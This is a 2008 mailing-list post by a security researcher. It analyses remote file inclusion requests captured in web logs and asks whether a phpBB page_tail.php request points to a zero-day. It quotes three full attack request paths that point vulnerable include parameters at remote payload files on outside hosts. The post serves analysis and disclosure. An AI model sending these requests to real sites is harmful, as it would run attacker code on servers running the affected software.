[VIM] RFI BotNet and phpBB 0-day?
security curmudgeon
jericho at attrition.org
Thu Mar 20 10:04:39 UTC 2008
For a while i've noticed a ton of RFI requests made to attrition.org, the
frequency and patterns suggest it's a large botnet possibly. I haven't had
time to really dig into the logs and learn much about it. Tonight I saw
one request come across and got curious how many of these requests were
published vulnerabilities versus potential 0-day. Many requests don't have
enough information to easily determine the software (e.g.
/dir/index.php?id=http://), but this may:
/claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f
I don't see reference to "page_tail.php" in CVE or OSVDB. The directory
structure suggests it is either in Claroline or phpBB though.
http://www.claroline.net/download/stable.html
Version 1.8.9 .tar has "page.php" and "pager.lib.php" but not the file
above.
http://www.phpbb.com/downloads/
Version 2.0.23 ("legacy") has "page_tail.php" in it.
Version 3.0.0 (phpBB3) has no file by that name.
--
So, does anyone want to see if it is truly vulnerable? If so, we know it's
phpBB 2.0.23 (and maybe prior), we know the file name and variable, and we
know it is actively being exploited in the wild and discovered as a result
of it.
Brian
p.s. While writing this, a full example of one that would be a tad harder
to track down, but given the "com_comprofiler" and
"mosConfig_absolute_path", shouldn't be that difficult:
/index.php?_REQUEST=&_REQUEST%5boption%5d=option,com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://test15.digitalis.com.pa/components/com_atom/id.txt%3f%3f
p.p.s. And an example of an older disclosed vulnerability being used:
/squirrelcart/cart_content.php?cart_isp_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f
(CVE-2006-2483 / OSVDB 25523)
More information about the VIM
mailing list